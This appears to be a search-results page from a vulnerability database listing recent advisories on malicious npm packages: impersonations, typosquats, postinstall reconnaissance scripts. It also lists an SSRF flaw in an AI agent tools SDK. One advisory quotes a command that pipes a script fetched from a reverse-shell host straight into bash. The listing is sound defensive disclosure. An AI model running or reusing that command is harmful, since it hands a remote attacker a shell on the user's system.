Lucene search
+L

23723 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added yesterday8 views

Malicious code in loader1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e9578c2db9f9fd58bb7b743e3ca8581aa21f4632bb965dcb53b7a4aaa02e5667 The package ships a single index.html declared as main whose only behavior is to fetch...

6.1AI score
Exploits0References5
OSV
OSV
added yesterday3 views

MAL-2026-10696 Malicious code in loader1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e9578c2db9f9fd58bb7b743e3ca8581aa21f4632bb965dcb53b7a4aaa02e5667 The package ships a single index.html declared as main whose only behavior is to fetch...

6.1AI score
Exploits0References5
OSV
OSV
added yesterday4 views

MAL-2026-10694 Malicious code in vor8zakon (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 99924288481504c324c3f573ba7ba99ac4e1c7a7f22a940c94d81059b868fdfd Package advertises itself as 'A simple cryptographic library for JavaScript applications' but ships no crypto code and exports nothing. package.json...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added yesterday6 views

Malicious code in vor8zakon (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 99924288481504c324c3f573ba7ba99ac4e1c7a7f22a940c94d81059b868fdfd Package advertises itself as 'A simple cryptographic library for JavaScript applications' but ships no crypto code and exports nothing. package.json...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago8 views

Malicious code in internallib_v907 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e index.js line 5 invokes exec'/bin/bash -c "curl https://reverse-shell.sh/... | sh"', piping a remote script directly into a shell. The fetched payloa...

6.1AI score
Exploits0References2
OSV
OSV
added 2 days ago3 views

MAL-2026-10691 Malicious code in internallib_v907 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e index.js line 5 invokes exec'/bin/bash -c "curl https://reverse-shell.sh/... | sh"', piping a remote script directly into a shell. The fetched payloa...

6.1AI score
Exploits0References2
EUVD
EUVD
added 2 days ago5 views

EUVD-2026-44762

Strands Agents is an open-source Python SDK for building and running AI agents. The strands-agents-tools package provides pre-built tools for use with the SDK, including the elasticsearchmemory tool for agent memory storage. We identified CVE-2026-15746, a server-side request forgery SSRF issue i...

6.9CVSS6.1AI score0.00244EPSS
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago8 views

Malicious code in @fhkry/x-baileys (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector db9f6c3e5c391d9d3ffeb7f6c1b4154b0266efeb73bdf5543ad81f50236bdabc This package presents itself as a fork of @whiskeysockets/baileys impersonating the original author 'Adhiraj Singh' in package.json and exposing the...

6.1AI score
Exploits0References9
OSV
OSV
added 2 days ago6 views

MAL-2026-10665 Malicious code in @fhkry/x-baileys (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector db9f6c3e5c391d9d3ffeb7f6c1b4154b0266efeb73bdf5543ad81f50236bdabc This package presents itself as a fork of @whiskeysockets/baileys impersonating the original author 'Adhiraj Singh' in package.json and exposing the...

6.1AI score
Exploits0References9
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago8 views

Malicious code in crypto-hasher (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5162012006c5d2576c6f93540445f10185d44acfb5cef39764f7a2b45c45d205 [email protected] impersonates the hash-wasm library. Its main entrypoint dist/index.umd.js injects code into the WASM Interface update method so...

6.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago6 views

Malicious code in ssweb-wp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4cdc75de95852418c3d695299d52199b24e52202b2e5595089b3107a73c1e86b The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago5 views

Malicious code in @sauruslord/libsignal (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b0c2cf2672d98396a7b66cb732741d269732f5faae72293ea46e06b879e7a45b Package name impersonates Open Whisper Systems' libsignal-node but ships unrelated code. On require of index.js, after a 1-second delay, install.js...

6.1AI score
Exploits0References2
OSV
OSV
added 2 days ago4 views

MAL-2026-10661 Malicious code in sauruslord-baileys (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 474b90ec19af5dbbc5bf3c8d27c0c4d079c7d980d6e3316dad3bbf5682abbe52 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago8 views

Malicious code in webpack-session-cache (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0007695a788bff7d6d0a87ee48de6771c12a1e21241bd3fc0bc7b5509608533e The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago6 views

Malicious code in @hkyyy/portal-widget-helper-0601 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f72e27d8bfbf5b9bfefe661d642be934399a38031c1bee028a20ed3282e0f482 The package has no real functionality — index.js only exports ok: true — and its sole effect is to run a postinstall reconnaissance script...

6.1AI score
Exploits0References2
OSV
OSV
added 2 days ago3 views

MAL-2026-10648 Malicious code in @hkyyy/portal-widget-helper-0601 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f72e27d8bfbf5b9bfefe661d642be934399a38031c1bee028a20ed3282e0f482 The package has no real functionality — index.js only exports ok: true — and its sole effect is to run a postinstall reconnaissance script...

6.1AI score
Exploits0References2
OSV
OSV
added 3 days ago4 views

MAL-2026-10651 Malicious code in iwsdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 66af3674e89512532e1448a9421b3318388094ff91bb2e8c32714670a7f5f2cc The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 3 days ago5 views

Malicious code in install-skia (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b665b508eeae9e0e619ed7b68e3a43248cd81d67d40a0516bbd62981ddb2359f The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 3 days ago8 views

Malicious code in iwsdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 66af3674e89512532e1448a9421b3318388094ff91bb2e8c32714670a7f5f2cc The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSV
OSV
added 3 days ago4 views

MAL-2026-10650 Malicious code in install-skia (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b665b508eeae9e0e619ed7b68e3a43248cd81d67d40a0516bbd62981ddb2359f The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
Rows per page
Query Builder